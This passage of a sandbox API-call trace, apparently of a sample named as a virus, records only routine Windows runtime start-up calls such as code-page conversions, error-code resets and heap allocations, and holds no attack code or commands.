!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+ÃË£\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.581] GetLastError () returned 0x0 [0045.581] SetLastError (dwErrCode=0x0) [0045.581] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.581] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋯ沔@Ā") returned 256 [0045.581] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋯ沔@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0045.581] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꋯ沔@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0045.581] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+ÃË£\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.581] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a588, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb023c854d3c8a24589e9294fd5d346e.virus.exe")) returned 0x45 [0045.581] GetLastError () returned 0x0 [0045.581] SetLastError (dwErrCode=0x0) [0045.581] GetLastError () returned 0x0 [0045.581] SetLastError (dwErrCode=0x0) [0045.581] GetLastError () returned 0x0 [0045.581] SetLastError (dwErrCode=0x0) [0045.581] GetLastError () returned 0x0 [0045.581] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.582] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.582] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.582] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.582] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.582] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.582] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.582] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.582] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.582] SetLastError (dwErrCode=0x0) [0045.582] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.583] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.583] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.583] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.583] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.583] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.583] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.583] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.583] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.583] GetLastError () returned 0x0 [0045.583] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.584] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.584] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.584] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.584] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.584] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.584] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.584] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.584] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.584] SetLastError (dwErrCode=0x0) [0045.584] GetLastError () returned 0x0 [0045.585] SetLastError (dwErrCode=0x0) [0045.585] GetLastError () returned 0x0 [0045.585] SetLastError (dwErrCode=0x0) [0045.585] GetLastError () returned 0x0 [0045.585] SetLastError (dwErrCode=0x0) [0045.585] GetLastError () returned 0x0 [0045.585] SetLastError (dwErrCode=0x0) [0045.585] GetLastError () returned 0x0 [0045.585] SetLastError (dwErrCode=0x0) [0045.585] GetLastError () returned 0x0 [0045.585] SetLastError (dwErrCode=0x0) [0045.585] GetLastError () returned 0x0 [0045.585] SetLastError (dwErrCode=0x0) [0045.585] GetLastError () returned 0x0 [0045.585] SetLastError (dwErrCode=0x0) [0045.585] GetLastError () returned 0x0 [0045.585] SetLastError (dwErrCode=0x0) [0045.585] GetLastError () returned 0x0 [0045.586] SetLastError (dwErrCode=0x0) [0045.586] GetLastError () returned 0x0 [0045.588] SetLastError (dwErrCode=0x0) [0045.588] GetLastError () returned 0x0 [0045.588] SetLastError (dwErrCode=0x0) [0045.588] GetLastError () returned 0x0 [0045.588] SetLastError (dwErrCode=0x0) [0045.588] GetLastError () returned 0x0 [0045.588] SetLastError (dwErrCode=0x0) [0045.588] GetLastError () returned 0x0 [0045.588] SetLastError (dwErrCode=0x0) [0045.588] GetLastError () returned 0x0 [0045.589] SetLastError (dwErrCode=0x0) [0045.589] GetLastError () returned 0x0 [0045.589] SetLastError (dwErrCode=0x0) [0045.589] GetLastError () returned 0x0 [0045.589] SetLastError (dwErrCode=0x0) [0045.589] GetLastError () returned 0x0 [0045.589] SetLastError (dwErrCode=0x0) [0045.589] GetLastError () returned 0x0 [0045.589] SetLastError (dwErrCode=0x0) [0045.589] GetLastError () returned 0x0 [0045.589] SetLastError (dwErrCode=0x0) [0045.589] GetLastError () returned 0x0 [0045.589] SetLastError (dwErrCode=0x0) [0045.589] GetLastError () returned 0x0 [0045.589] SetLastError (dwErrCode=0x0) [0045.589] GetLastError () returned 0x0 [0045.589] SetLastError (dwErrCode=0x0) [0045.589] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.590] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.590] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.590] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.590] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.590] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.590] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.590] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.590] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.590] GetLastError () returned 0x0 [0045.590] SetLastError (dwErrCode=0x0) [0045.591] GetLastError () returned 0x0 [0045.591] SetLastError (dwErrCode=0x0) [0045.591] GetLastError () returned 0x0 [0045.591] SetLastError (dwErrCode=0x0) [0045.591] GetLastError () returned 0x0 [0045.591] SetLastError (dwErrCode=0x0) [0045.591] GetLastError () returned 0x0 [0045.591] SetLastError (dwErrCode=0x0) [0045.591] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4e) returned 0x6119b0 [0045.591] GetLastError () returned 0x0 [0045.591] SetLastError (dwErrCode=0x0) [0045.591] GetLastError () returned 0x0 [0045.591] SetLastError (dwErrCode=0x0) [0045.591] GetLastError () returned 0x0 [0045.591] SetLastError (dwErrCode=0x0) [0045.591] GetLastError () returned 0x0 [0045.591] SetLastError (dwErrCode=0x0) [0045.591] GetLastError () returned 0x0 [0045.591] SetLastError (dwErrCode=0x0) [0045.591] GetLastError () returned 0x0 [0045.592] SetLastError (dwErrCode=0x0) [0045.592] GetLastError () returned 0x0 [0045.592] SetLastError (dwErrCode=0x0) [0045.592] GetLastError () returned 0x0 [0045.592] SetLastError (dwErrCode=0x0) [0045.592] GetLastError () returned 0x0 [0045.592] SetLastError (dwErrCode=0x0) [0045.592] GetLastError () returned 0x0 [0045.592] SetLastError (dwErrCode=0x0) [0045.592] GetLastError () returned 0x0 [0045.592] SetLastError (dwErrCode=0x0) [0045.592] GetLastError () returned 0x0 [0045.592] SetLastError (dwErrCode=0x0) [0045.592] GetLastError () returned 0x0 [0045.592] SetLastError (dwErrCode=0x0) [0045.592] GetLastError () returned 0x0 [0045.593] SetLastError (dwErrCode=0x0) [0045.593] GetLastError () returned 0x0 [0045.593] SetLastError (dwErrCode=0x0) [0045.593] GetLastError () returned 0x0 [0045.593] SetLastError (dwErrCode=0x0) [0045.593] GetLastError () returned 0x0 [0045.593] SetLastError (dwErrCode=0x0) [0045.593] GetLastError () returned 0x0 [0045.593] SetLastError (dwErrCode=0x0) [0045.593] GetLastError () returned 0x0 [0045.593] SetLastError (dwErrCode=0x0) [0045.593] GetLastError () returned 0x0 [0045.593] SetLastError (dwErrCode=0x0) [0045.593] GetLastError () returned 0x0 [0045.593] SetLastError (dwErrCode=0x0) [0045.593] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.594] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.594] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.594] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.594] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.594] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.594] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.594] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.594] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.594] GetLastError () returned 0x0 [0045.594] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.595] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.595] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.595] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.595] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.595] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.595] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.595] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.595] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.595] SetLastError (dwErrCode=0x0) [0045.595] GetLastError () returned 0x0 [0045.596] SetLastError (dwErrCode=0x0) [0045.596] GetLastError () returned 0x0 [0045.596] SetLastError (dwErrCode=0x0) [0045.596] GetLastError () returned 0x0 [0045.596] SetLastError (dwErrCode=0x0) [0045.596] GetLastError () returned 0x0 [0045.596] SetLastError (dwErrCode=0x0) [0045.596] GetLastError () returned 0x0 [0045.596] SetLastError (dwErrCode=0x0) [0045.596] GetLastError () returned 0x0 [0045.596] SetLastError (dwErrCode=0x0) [0045.596] GetLastError () returned 0x0 [0045.596] SetLastError (dwErrCode=0x0) [0045.596] GetLastError () returned 0x0 [0045.596] SetLastError (dwErrCode=0x0) [0045.596] GetLastError () returned 0x0 [0045.596] SetLastError (dwErrCode=0x0) [0045.597] GetLastError () returned 0x0 [0045.597] SetLastError (dwErrCode=0x0) [0045.597] GetLastError () returned 0x0 [0045.597] SetLastError (dwErrCode=0x0) [0045.597] GetLastError () returned 0x0 [0045.597] SetLastError (dwErrCode=0x0) [0045.597] GetLastError () returned 0x0 [0045.597] SetLastError (dwErrCode=0x0) [0045.597] GetLastError () returned 0x0 [0045.597] SetLastError (dwErrCode=0x0) [0045.597] GetLastError () returned 0x0 [0045.597] SetLastError (dwErrCode=0x0) [0045.597] GetLastError () returned 0x0 [0045.597] SetLastError (dwErrCode=0x0) [0045.597] GetLastError () returned 0x0 [0045.597] SetLastError (dwErrCode=0x0) [0045.597] GetLastError () returned 0x0 [0045.597] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.598] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.598] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.598] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.598] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.598] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.598] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.598] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.598] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.598] SetLastError (dwErrCode=0x0) [0045.598] GetLastError () returned 0x0 [0045.599] SetLastError (dwErrCode=0x0) [0045.599] GetLastError () returned 0x0 [0045.599] SetLastError (dwErrCode=0x0) [0045.599] GetLastError () returned 0x0 [0045.599] SetLastError (dwErrCode=0x0) [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x98) returned 0x611a08 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1f) returned 0x611aa8 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2b) returned 0x611ad0 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x37) returned 0x611b08 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3c) returned 0x611b48 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x31) returned 0x611b90 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x611bd0 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x611bf0 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x611c20 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xd) returned 0x611c40 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1a) returned 0x611c58 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2e) returned 0x611c80 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x19) returned 0x611cb8 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x17) returned 0x611ce0 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x611d00 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x95) returned 0x611d18 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3e) returned 0x611db8 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1b) returned 0x611e00 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1d) returned 0x611e28 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x48) returned 0x611e50 [0045.599] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x611ea0 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x611ec0 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1b) returned 0x611ee0 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x611f08 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x29) returned 0x611f38 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1e) returned 0x611f70 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x6b) returned 0x611f98 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x17) returned 0x612010 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xf) returned 0x612030 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x16) returned 0x612048 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2a) returned 0x612068 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x29) returned 0x6120a0 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x16) returned 0x6120d8 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x13) returned 0x6120f8 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1f) returned 0x612118 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x612140 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x612160 [0045.600] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x46) returned 0x612180 [0045.615] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6111f8 | out: hHeap=0x610000) returned 1 [0045.630] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x769b0000 [0045.631] GetProcAddress (hModule=0x769b0000, lpProcName="IsProcessorFeaturePresent") returned 0x769c51ed [0045.631] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0045.633] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x800) returned 0x6121d0 [0045.633] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x80) returned 0x6111f8 [0045.633] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x408c11) returned 0x0 [0045.634] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6111f8) returned 0x80 [0045.634] GetLastError () returned 0x0 [0045.634] SetLastError (dwErrCode=0x0) [0045.634] GetLastError () returned 0x0 [0045.634] SetLastError (dwErrCode=0x0) [0045.634] GetLastError () returned 0x0 [0045.635] SetLastError (dwErrCode=0x0) [0045.635] GetLastError () returned 0x0 [0045.635] SetLastError (dwErrCode=0x0) [0045.635] GetLastError () returned 0x0 [0045.635] SetLastError (dwErrCode=0x0) [0045.635] GetLastError () returned 0x0 [0045.635] SetLastError (dwErrCode=0x0) [0045.635] GetLastError () returned 0x0 [0045.635] SetLastError (dwErrCode=0x0) [0045.635] GetLastError () returned 0x0 [0045.635] SetLastError (dwErrCode=0x0) [0045.635] GetLastError () returned 0x0 [0045.635] SetLastError (dwErrCode=0x0) [0045.635] GetLastError () returned 0x0 [0045.635] SetLastError (dwErrCode=0x0) [0045.635] GetLastError () returned 0x0 [0045.635] SetLastError (dwErrCode=0x0) [0045.635] GetLastError () returned 0x0 [0045.636] SetLastError (dwErrCode=0x0) [0045.636] GetLastError () returned 0x0 [0045.636] SetLastError (dwErrCode=0x0) [0045.636] GetLastError () returned 0x0 [0045.636] SetLastError (dwErrCode=0x0) [0045.636] GetLastError () returned 0x0 [0045.636] SetLastError (dwErrCode=0x0) [0045.636] GetLastError () returned 0x0 [0045.636] SetLastError (dwErrCode=0x0) [0045.636] GetLastError () returned 0x0 [0045.636] SetLastError (dwErrCode=0x0) [0045.636] GetLastError () returned 0x0 [0045.636] SetLastError (dwErrCode=0x0) [0045.636] GetLastError () returned 0x0 [0045.636] SetLastError (dwErrCode=0x0) [0045.636] GetLastError () returned 0x0 [0045.636] SetLastError (dwErrCode=0x0) [0045.636] GetLastError () returned 0x0 [0045.637] SetLastError (dwErrCode=0x0) [0045.637] GetLastError () returned 0x0 [0045.637] SetLastError (dwErrCode=0x0) [0045.637] GetLastError () returned 0x0 [0045.637] SetLastError (dwErrCode=0x0) [0045.637] GetLastError () returned 0x0 [0045.637] SetLastError (dwErrCode=0x0) [0045.637] GetLastError () returned 0x0 [0045.637] SetLastError (dwErrCode=0x0) [0045.637] GetLastError () returned 0x0 [0045.637] SetLastError (dwErrCode=0x0) [0045.637] GetLastError () returned 0x0 [0045.637] SetLastError (dwErrCode=0x0) [0045.637] GetLastError () returned 0x0 [0045.638] SetLastError (dwErrCode=0x0) [0045.638] GetLastError () returned 0x0 [0045.638] SetLastError (dwErrCode=0x0) [0045.638] GetLastError () returned 0x0 [0045.638] SetLastError (dwErrCode=0x0) [0045.638] GetLastError () returned 0x0 [0045.638] SetLastError (dwErrCode=0x0) [0045.638] GetLastError () returned 0x0 [0045.638] SetLastError (dwErrCode=0x0) [0045.638] GetLastError () returned 0x0 [0045.638] SetLastError (dwErrCode=0x0) [0045.638] GetLastError () returned 0x0 [0045.638] SetLastError (dwErrCode=0x0) [0045.638] GetLastError () returned 0x0 [0045.638] SetLastError (dwErrCode=0x0) [0045.638] GetLastError () returned 0x0 [0045.639] SetLastError (dwErrCode=0x0) [0045.639] GetLastError () returned 0x0 [0045.639] SetLastError (dwErrCode=0x0) [0045.639] GetLastError () returned 0x0 [0045.639] SetLastError (dwErrCode=0x0) [0045.639] GetLastError () returned 0x0 [0045.639] SetLastError (dwErrCode=0x0) [0045.639] GetLastError () returned 0x0 [0045.639] SetLastError (dwErrCode=0x0) [0045.639] GetLastError () returned 0x0 [0045.639] SetLastError (dwErrCode=0x0) [0045.639] GetLastError () returned 0x0 [0045.639] SetLastError (dwErrCode=0x0) [0045.639] GetLastError () returned 0x0 [0045.639] SetLastError (dwErrCode=0x0) [0045.639] GetLastError () returned 0x0 [0045.639] SetLastError (dwErrCode=0x0) [0045.639] GetLastError () returned 0x0 [0045.640] SetLastError (dwErrCode=0x0) [0045.640] GetLastError () returned 0x0 [0045.640] SetLastError (dwErrCode=0x0) [0045.640] GetLastError () returned 0x0 [0045.640] SetLastError (dwErrCode=0x0) [0045.640] GetLastError () returned 0x0 [0045.640] SetLastError (dwErrCode=0x0) [0045.640] GetLastError () returned 0x0 [0045.640] 